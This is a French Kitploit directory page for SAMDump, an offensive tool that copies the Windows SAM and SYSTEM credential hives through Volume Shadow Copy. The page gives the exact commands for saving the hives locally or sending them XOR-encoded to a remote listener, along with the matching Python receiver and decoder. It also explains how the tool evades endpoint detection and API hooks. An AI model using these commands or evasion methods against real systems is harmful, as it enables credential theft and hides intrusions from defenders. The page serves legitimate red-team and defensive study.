Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SAMDump — Extrayez les ruches SAM et SYSTEM à l'aide de l'API Volume Shadow Copy (VSS). Avec des options d'exfiltration et d'obfuscation XOR. En C#, C++, Crystal, Python, Rust, Golang, Nim et Deno (Javascript) | Kitploit
Outils/GitHubGitHub/ricardojoserf/samdump
Escalade de PrivilègesOutils de Chiffrement/DéchiffrementExfiltration de DonnéesPost-ExploitationUtilitaires et FrameworksRed Teaming
GitHubricardojoserf/samdump

SAMDump

Extrayez les ruches SAM et SYSTEM à l'aide de l'API Volume Shadow Copy (VSS). Avec des options d'exfiltration et d'obfuscation XOR. En C#, C++, Crystal, Python, Rust, Golang, Nim et Deno (Javascript)

Voir le dépôt
372464il y a 9 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

SAMDump

Extrait les fichiers SAM et SYSTEM de Windows en utilisant le service de cliché instantané de volume (VSS) avec plusieurs options d'exfiltration et d'obfuscation XOR :

  • Liste les clichés instantanés de volume à l'aide de VSS et en crée un si nécessaire
  • Extrait les fichiers SAM et SYSTEM du cliché instantané
  • Utilise les appels API NT pour les opérations sur les fichiers (NtCreateFile, NtReadFile, NtWriteFile)
  • Prend en charge l'encodage XOR pour l'obfuscation
  • Méthodes d'exfiltration : Sauvegarde locale ou Transfert réseau

Il est implémenté en C++, C#, Crystal et Python, et fonctionne sur les versions modernes de Windows.

Il nécessite des privilèges élevés, et si le cliché instantané est créé, il est automatiquement supprimé après environ 5 minutes.


Utilisation

root@kitploit:~
SAMDump.exe [OPTIONS]

Options:
  --save-local [BOOL]    Save locally (default: false)
  --output-dir DIR       Output directory (default: C:\Windows\tasks)
  --send-remote [BOOL]   Send remotely (default: false)
  --host IP              Host for remote sending (default: 127.0.0.1)
  --port PORT            Port for remote sending (default: 7777)
  --xor-encode [BOOL]    XOR Encode (default: false)
  --xor-key KEY          Enable XOR with specified key (default: SAMDump2025)
  --disk DISK            Disk for shadow copy (default: C:\)
  --help                 Show this help

Sauvegarde locale sans encodage :

root@kitploit:~
SAMDump.exe --save-local --output-dir "C:\temp"

img1

Sauvegarde locale avec encodage XOR :

root@kitploit:~
SAMDump.exe --save-local --xor-encode --xor-key "SAMDump2025"

img2

Envoi vers un serveur distant avec encodage XOR et clé par défaut :

root@kitploit:~
SAMDump.exe --send-remote --host 192.168.1.72 --port 1234 --xor-encode

img3


Serveur pour recevoir les fichiers

server.py est un serveur Python qui reçoit les fichiers sur le réseau avec décodage XOR automatique et formatage du nom de fichier :

root@kitploit:~
python server.py [OPTIONS]

Options:
  --host HOST     IP address to listen on (default: 0.0.0.0)
  --port PORT     Port to listen on (default: 7777)
  --xor-key KEY   Key for XOR decoding (optional)

Écouteur sur une interface et un port spécifiques avec clé XOR :

root@kitploit:~
python server.py --host 192.168.1.72 --port 1234 --xor-key "SAMDump2025"

img4

Le nom de fichier contient l'adresse IP et la date, ce qui permet d'envoyer les fichiers depuis différents systèmes, automatisant ainsi le processus.


Script pour décoder les fichiers

xor-decoder.py est un script Python pour décoder localement les fichiers SAM et SYSTEM encodés en XOR :

root@kitploit:~
python xor-decoder.py [OPTIONS]

Options:
  --sam SAM         Path to encoded SAM file (required)
  --system SYSTEM   Path to encoded SYSTEM file (required)
  --xor-key KEY     XOR key for decoding (default: SAMDump2025)
  --output-dir DIR  Output directory for decoded files (default: ./decoded)

Décodage avec la clé par défaut :

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt

img5

Décodage avec clé personnalisée et répertoire de sortie :

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt --xor-key "MyKey" --output-dir ./results

img6


Implémentations

Le projet comprend des versions implémentées dans trois langages :

  • C++ : Implémentation initiale
  • C# : Version .NET pour une meilleure portabilité
  • Python : Nécessite l'installation de la bibliothèque comtypes (pip install comtypes)

Motivation

Je souhaitais automatiser ce processus et la plupart des systèmes Windows que je rencontre exécutent VSS, mais les solutions de sécurité détectent l'utilisation de vssadmin pour créer des clichés instantanés et extraire ces fichiers car il s'agit d'une technique bien connue.

Cet outil extrait les fichiers sans écrire sur le système de fichiers cible lors de l'utilisation du mode de transfert distant ; et l'encodage XOR offre une obfuscation de base pour contourner la détection basée sur les signatures (même en mode distant).

De plus, il utilise les appels API NT pour contourner certaines surveillances et hooks d'API en mode utilisateur.


Intégration de l'API NT

L'outil utilise des appels système NT au lieu des fonctions API Windows standard, ce qui peut contourner certains hooks d'API en mode utilisateur couramment surveillés :

  • NtCreateFile et NtReadFile : Utilisés pour ouvrir un handle et lire les octets des fichiers SAM et SYSTEM dans le cliché instantané

  • NtWriteFile : Utilisé pour sauvegarder les fichiers localement


Remerciements

Merci à @vx-underground d'avoir identifié et suggéré des optimisations dans le code de parcours de la table d'exportation des adresses (EAT), en remplaçant les appels inutiles NtReadVirtualMemory par un accès direct aux pointeurs.

Télécharger l’outil